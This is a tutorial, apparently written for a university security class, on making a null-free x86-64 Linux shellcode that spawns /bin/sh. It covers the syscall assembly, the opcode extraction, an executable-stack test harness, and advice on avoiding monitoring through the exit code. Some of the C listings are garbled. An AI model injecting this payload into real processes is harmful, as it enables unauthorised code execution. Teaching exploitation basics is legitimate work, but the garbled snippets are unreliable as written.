Making of a shellcode for a 64-bit Linux.
Spoiler: A quick return to basics with an article that takes us to the basics of software exploitation: making a shellcode on a 64-bit archi.
The other day, while teaching a class at INSA, I presented students with a method for making their own shellcode.
For those unfamiliar with the term, it is a string of characters containing binary code that can be executed on a machine. It must be different depending on the architecture on which it will run, but also on the OS for which it is intended.
My transparencies then showed as an example the creation of a shellcode on a Linux, for a 32-bit architecture. The binary executed was the most classic of shellcode: opening a command line.
And obviously, I was asked the following question: “What about 64bits?”
Here is a small article to answer the question, it details the
creation of a shellcode allowing to launch /bin/sh
if you have a Linux and a 64 bits processor.
Code C
If we were dead good, we could of course write the shellcode directly in machine code … But few people speak opcode fluently … Even assembly (a translation of opcodes a second more readable) is a language which is not very widespread …
Tradition has it, therefore, that when we write a shellcode, we start with a code in C, which we will translate into assembler, then into machine code.
Writing code in C is optional, but has two advantages:
- it allows you to define a target, what is our code going to do exactly?
- it allows to have an executable that we can disassemble (translate
into assembly), for example, thanks to
gdb
, in order to see how it is done.
Target
The following program will launch a shell, through the use of
execve
. It will serve as our target: it represents exactly
what we want our shellcode to do.
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void main() {
char *name[2];
[0] = "/bin/sh";
name[1] = NULL;
name(name[0], name, NULL);
execve(0);
exit}
When calling execve ()
, the system will replace the
current process with the one corresponding to the execution of
/bin/sh
. If this operation is successful, the instruction
flow is interrupted to continue in this new process. If this fails,
execution will continue with the call exit(0)
.
In a main
like ours, the call toexit(0)
is
useless since ifexecve
failed, the program would terminate
naturally anyway.
But the purpose of a shellcode is to be injected into the memory of
an attacked process to be executed (i.e. by buffer
overflow but not only). As we have no certainty either on the
success of execve()
, or on the contents of memory after our
shellcode, we prefer to force a quiet termination of the process by a
call to exit()
rather than to do so. let anything do it
anyhow.
If we wanted to be cleaner, we would have to do an
exit(1)
but as we generally do not want to attract the
attention of monitoring by error return codes (with a 1), we lie to it
saying that everything is fine (with a 0).
The compilation
We compile with gcc
, then we run the binary and we
observe that we have indeed opened a shell.
arsouyes@VBox:~/Documents$ gcc shellcode.c -o shellcode
arsouyes@VBox:~/Documents$ ./shellcode
$
If you want to observe the disassembled code with gdb
, I
advise you to compile with the following options:
-static
compiles in static mode, so as not to depend on external libraries, and at the same time, will allow to decompile the code ofexecve
since it will be integrated into our binary,-ggdb
allows you to get more information in gdb, such as the name of functions,-fno-stack-protector
allows you to remove the protection against buffer overflow set by default at compile time bygcc
. On the one hand, because we don’t care that our shellcode is protected against buffer overflow, on the other hand, because it increases the assembly code that we are going to obtain, and that we want to go to the essential.
Go through the assembly
Now that we know where we are going, we will write the assembly code corresponding to the C code.
We come up against two constraints:
- know the address of
/bin/sh
. - get rid of external libraries.
The /bin/sh
string
It is not possible to know in advance the address of the string
/bin/sh
. We will therefore have to cunning to recover
it.
Interestingly, since we are on a 64-bit architecture, it is possible
to directly store the string /bin/sh
, in its hexadecimal
form, in a register. /bin/sh
in hexadecimal
gives:2f.62.69.6e.2f.73.68
. As we are on a little-endian
architecture, this will give 0x68732f6e69622f
. Finally,
since this is a character string, we will add the empty character
(0x00
) at the end, so we will store the
string0x0068732f6e69622f
in a register.
We can then pusher this register on the stack. The string address will then be the stack pointer address.
Execve
The second constraint is the obligation to free ourselves from any
external libraries, because we are not sure that they are present. We
will therefore have to go to the source of the calls, in our case to
execve
andexit
.
The execve
function is quite a special function. It
requires asking the operating system to perform process control tasks.
As our user process is not capable of making these kinds of requests, we
have to make system
calls.
A little search in the system
call table of the Linux kernel tells us that execve
matches to system call number 59, i.e. 0x3b
in
hexadecimal.
By convention
when calling a system call, on Linux, the parameters are passed via the
registers in the following order: rdi
,rsi
,
rdx
,rcx
, r8
,r9
.
Likewise, by convention,
the system call number must be in the rax
registry. The
system call is then made via the assembly instruction
syscall
. So we need to put the address of
/bin/sh
in therdi
register, the address of the
address of /bin/sh
in thersi
register, and 0
in the rdx
register. We also need to have0x3b
in the rax
registry.
Which translates into assembly by:
mov $0x3b, %rax
mov $0x0, %rdx
movabs $0x0068732f6e69622f,%r8
push %r8
mov %rsp, %rdi
push %rdx
push %rdi
mov %rsp, %rsi
syscall
mov $0x3c, %rax
mov $0x0, %rdi
syscall
Exit
As before, exit is a system call. It therefore works in the same way
as execve
, i.e. its only parameter will be in
therdi
register, and its number (60,
i.e. 0x3c
), must be in the register rax
.
Its assembly code will therefore be:
mov $0x3c, %rax
mov $0x0, %rdi
syscall
If you want to use gdb to disassemble exit and observe its code, you will find that this is tedious;
exit
calls_run_exit_handlers
which itself does a lot of things before calling_exit
, which ends up doing the syscall by putting 0x3c in therax
register.
Final code
Now that we have all the information to write our code, we can
concatenate it together and write the code in assembly language. To
facilitate, we add the few decorations that will allow us to have an
autonomous asm
code:
.section .text
.globl _start
_start:
mov $0x3b, %rax
mov $0x0, %rdx
movabs $0x0068732f6e69622f,%r8
push %r8
mov %rsp, %rdi
push %rdx
push %rdi
mov %rsp, %rsi
syscall
mov $0x3c, %rax
mov $0x0, %rdi
syscall
We convert to object code with as
, then we generate an
executable file withld
.
Since we are not using an external library, ld will just do some “decoration”, that is, the header, the entry point, and not much more …
arsouyes@VBox:~/Documents$ as -o asm.o asm.s
arsouyes@VBox:~/Documents$ ld -o asm asm.o
arsouyes@VBox:~/Documents$ ./asm
$
Opcode
Now that we have our assembly code, we can finally switch to machine
code. Each instruction must be translated into machine code, a sequence
of 0
and1
understandable by the processor. You
can use the INTEL
documentation for this.
But as a good computer scientist is a lazy computer scientist, we will use objdump, which will do it for us …
objdump is a command line program for displaying various
information about object files. The option we are interested in is
-d
, which allows disassembly. Each instruction is split
into a line, which begins with its address, then its hexadecimal
version, and finally, its assembly code.
arsouyes@VBox:~/Documents$ objdump -d asm.o
asm.o: format de fichier elf64-x86-64
Déassemblage de la section .text :
0000000000000000 <_start>:
0: 48 c7 c0 3b 00 00 00 mov $0x3b,%rax
7: 48 c7 c2 00 00 00 00 mov $0x0,%rdx
e: 49 b8 2f 62 69 6e 2f movabs $0x68732f6e69622f,%r8
15: 73 68 00
18: 41 50 push %r8
1a: 48 89 e7 mov %rsp,%rdi
1d: 52 push %rdx
1e: 57 push %rdi
1f: 48 89 e6 mov %rsp,%rsi
22: 0f 05 syscall
24: 48 c7 c0 3c 00 00 00 mov $0x3c,%rax
2b: 48 c7 c7 00 00 00 00 mov $0x0,%rdi
32: 0f 05 syscall
We will get the hexadecimal. This is our shellcode.
\x48\xc7\xc0\x3b\x00\x00\x00\x48
\xc7\xc2\x00\x00\x00\x00\x49\xb8
\x2f\x62\x69\x6e\x2f\x73\x68\x00
\x41\x50\x48\x89\xe7\x52\x57\x48
\x89\xe6\x0f\x05\x48\xc7\xc0\x3c
\x00\x00\x00\x48\xc7\xc7\x00\x00
\x00\x00\x0f\x05
We can then test our shellcode. For that, we will use a small C code. By declaring a function pointer and giving it as value the address of the shellcode, we will be able to execute it:
#include<stdio.h>
#include<string.h>
int main(int argc, char **argv) {
unsigned char code[] =
"\x48\xc7\xc0\x3b\x00\x00\x00\x48"
"\xc7\xc2\x00\x00\x00\x00\x49\xb8"
"\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x41\x50\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05\x48\xc7\xc0\x3c"
"\x00\x00\x00\x48\xc7\xc7\x00\x00"
"\x00\x00\x0f\x05";
int (*ret)() = (int(*)())code;
();
ret}
To compile, you must use the following options:
-fno-stack-protector
to remove the stack protection automatically set bygcc
-z execstack
in order to mark the program as allowing an executable stack.
arsouyes@VBox:~/Documents$ gcc testop.c -o testop -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop
$ exit
You may also need to install the execstack package.
And There you go ! Our shellcode works!
Remove 0x00
Our shellcode is still far from ready for real-world use.
The presence of 0x00
in it can cause it to be truncated
when copying with a function like strcpy …
An alternative must therefore be found for each problematic instruction.
A mov
instruction containing opcodes with 0’s can be
replaced by apush
, followed by a pop
.
In our case :
mov $0x3b,%rax
et
mov $0x3c,%rax
are problematic and can
be replaced by
push $0x3b
pop %rax
and
push $0x3c
pop %rax
An instruction putting 0x00 in a register can be replaced by an
xor
of the register on itself.
We therefore perform a first replacement:
mov $0x0,%rdx
; xor %rdx,%rdx
And a second:
mov $0x0,%rdi
; xor %rdi,%rdi
Finally, our string itself ends with a \0
. To avoid
this, we will use the string //bin/sh
, which we will put in
the r8 register, then we will make an 8-bit shift, which will therefore
put a 0 at the end of the string .
In our case :
movabs $0x0068732f6e69622f,%r8
will be replaced by
movabs $0x0068732f6e69622f,%r8
; movabs $0x68732f6e69622f2f,%r8
shr $0x8, %r8
Our final assembly code will therefore be:
.section .text
.globl _start
_start:
push $0x3b
pop %eax
xor %rdx,%rdx
movabs $0x68732f6e69622f2f,%r8
shr $0x8, %r8
push %r8
mov %rsp, %rdi
push %rdx
push %rdi
mov %rsp, %rsi
syscall
push $0x3c
pop %eax
xor %rdi,%rdi
syscall
Using objdump
, we check that there is no more 0
left:
arsouyes@VBox:~/Documents$ objdump -d asm2.o
asm2.o: format de fichier elf64-x86-64
Déassemblage de la section .text :
0000000000000000 <_start>:
0: 6a 3b pushq $0x3b
2: 58 pop %rax
3: 48 31 d2 xor %rdx,%rdx
6: 49 b8 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%r8
d: 2f 73 68
10: 49 c1 e8 08 shr $0x8,%r8
14: 41 50 push %r8
16: 48 89 e7 mov %rsp,%rdi
19: 52 push %rdx
1a: 57 push %rdi
1b: 48 89 e6 mov %rsp,%rsi
1e: 0f 05 syscall
20: 6a 3c pushq $0x3c
22: 58 pop %rax
23: 48 31 ff xor %rdi,%rdi
26: 0f 05 syscall
We therefore have a shellcode from which we have removed the 0. We can test it in the same way as before, by inserting it in a C code.
#include<stdio.h>
#include<string.h>
int main(int argc, char **argv) {
unsigned char code[] =
"\x6a\x3b\x58\x48\x31\xd2\x49"
"\xb8\x2f\x2f\x62\x69\x6e\x2f"
"\x73\x68\x49\xc1\xe8\x08\x41"
"\x50\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05\x6a\x3c\x58"
"\x48\x31\xff\x0f\x05";
int (*ret)() = (int(*)())code;
();
ret}
By compiling and running:
arsouyes@VBox:~/Documents$ gcc testop2.c -o testop2 -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop2
$ exit
And after ?
You can use this method to create your own shellcodes. It can of course be adapted to a 32-bit Linux, or even to Windows. And reuse the principle to do more than just launch a shell …